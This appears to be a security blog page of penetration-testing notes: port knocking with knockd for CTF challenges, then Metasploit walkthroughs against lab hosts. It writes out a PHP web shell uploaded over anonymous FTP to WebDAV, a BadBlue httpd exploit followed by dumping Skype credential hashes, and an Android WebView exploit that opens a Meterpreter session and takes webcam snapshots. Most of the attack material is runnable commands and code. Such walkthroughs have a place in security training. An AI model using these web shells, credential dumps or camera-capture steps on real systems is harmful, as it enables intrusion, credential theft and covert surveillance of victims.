Slingshot Orbit of Technology

From Wikipedia “In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).”[1]

Install the Knockd Service and Client

sudo apt-get install knockd

A challenge may include using knock client and the default knockd sequence to open a new port(s). It is recommended that you scan the client namp -sV -p- -T5 [ipaddress]. This will show the current open port(s) and service/version information. Try the knocked default sequence knock -v [ipaddress] 7000 8000 9000.

There will be no immediate indication that a port has opened after knocking, as you will have to re-scan and compare to find the new open port. More than likely there is a time limit on how long the new port will stay open and available for access.

PROTIP: You may have to use “wget” to extract the flag. The command wget --no-check-certficate https://webaddress:port might extract the page hosted on the open port.

KnockdEfault Evaluator v1.1 – knock-knock

The two tools in this package are knockdefault.py and knockd_on-off.py. The first of these is a scanner to identify default configs and the latter is a utility to interact with identified vulnerable services.[2]

root@kali:~# git clone https://github.com/hack1thu7ch/knock-knock.git
root@kali:~# cd knock-knock/
root@kali:~# ./setup.sh
root@kali:~# ./knockdefault.py

Web Citations:
[1] http://en.wikipedia.org/wiki/Port_knocking
[2] http://www.shortbus.ninja/default-knockd-cloaking-configurations/

The video shows how to exploit bWAPP through FTP and Webdav using metasploit framework. Here are the steps:

• First run nmap and closely verify all the services
• Run Metasploit Framework and exploit webdav and enable it
• Run FTP and login and upload your backdoor
• Access your backdoor through web browser and get reverse shell

# msfconsole
msf > search ftp_login
msf > auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit

msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:

ftp> ls
ftp> put backdoor.php

backdoor.php code:

<?php

print_r(($_GET['x'])?exec($_GET['x']):'');

>?

Address Bar:

192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd

The video shows how to dump Skype hashes using metasploit framework and the BadBlue httpd 2.7. Here are the steps:

• Exploiting Windows 8 Machine using BadBlue httpd 2.7
• Use Post Exploitation Skype module to dump the hashes
• Crack MD5 hashes, as you will not get a plain text password(s)

nmap -sS -sV 192.168.25.129

msf> use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST 192.168.25.129
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit

“What I am going to show you today is that this phone is nominally not vulnerable … can become vulnerable quite easily just downloading fairly popular Apps form Google Play Store” said Tod Beardsley – Pirate Captain for Metasploit Framework, Rapid7. The sound advice of never side loading Apps and always going through the Play Store because its ‘safe’ is not always true, case in point:

msfconsole
use exploit/android/browser/webview_addjavascriptinterface
info
show options
set LHOST <ip address>
exploit

By downloading an aftermarket browser from the Google Play Store [in the video the App is called “Marathon Browser”] and viewing a specifically crafted web page the phone could be hacked and give up a meterpreter session. “Effectively this browser is a backdoor into my phone” explained Beardsley. The situation is critical, nearly 70 percent of Android based handsets are vulnerable because they run Android versions prior to 4.2.

sessions -i
sessions -i 1
ls 
cd /sdcard

While you only have the permissions of the browser you still have the ability to do a lot with the current user rights of the browser, even using the camera.

webcam_list
webcam_snap 1

“This module exploits a privilege escalation issue in Android < 4.2’s WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView’s HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup).”
source: http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface